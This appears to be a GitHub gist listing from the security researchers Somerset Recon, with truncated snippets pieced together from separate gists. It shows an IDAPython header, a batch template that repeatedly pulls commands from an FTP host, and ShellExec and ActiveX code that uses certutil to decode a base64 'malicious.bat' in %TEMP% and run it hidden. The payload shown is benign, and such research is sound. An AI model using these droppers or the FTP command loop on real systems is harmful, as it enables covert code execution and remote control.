ssr-research
ssr-research
/ into_vr_script.py
Last active
June 25, 2020 23:08
Introduction to IDAPython for Vulnerability Hunting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| #--------------------------------------------------------------------- | |
| # Introduction to IDAPython for Vulnerabiliity Hunting | |
| # | |
| # Author: Zach Miller, Somerset Recon | |
| # | |
| #--------------------------------------------------------------------- | |
| # A function to determine if an operand of an instruction is located on the stack. This is used for finding stack buffers | |
| # that have the potential to be overflowed |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmdShell = """@echo off | |
| echo "" > _in.txt | |
| echo "" > "%(output_file)s" | |
| (echo OPEN %(ftp_url)s %(port)s | |
| echo USER anonymous | |
| echo pass | |
| echo GET _in.txt | |
| echo BYE) > _init.txt | |
| for /L %%%%n in (0,0,0) do ( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Write out base64 encoded file to Windows TEMP directory | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt"); | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo ZWNobyBzZWN1cml0eXRlc3QgPiAlVEVNUCVcXG1hbGljaW91cy5leGU= >> %TEMP%\\test.txt"); | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt"); | |
| //Decode base64 encoded file and output malicious batch file | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat"); | |
| //Execute malicious batch file | |
| ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C %TEMP%\\malicious.bat"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Create ActiveX to run executables and commands | |
| wsh0=new ActiveXObject("WScript.shell"); | |
| //Write out base64 encoded file to Windows TEMP directory. cmd.exe will be run as a hidden process (0 flag). | |
| wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt",0); | |
| wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C echo ZWNobyBzZWN1cml0eXRlc3QgPiAlVEVNUCVcXG1hbGljaW91cy5leGU= >> %TEMP%\\test.txt",0); | |
| wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt",0); | |
| //Decode base64 encoded file and output malicious batch file | |
| wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat",0); |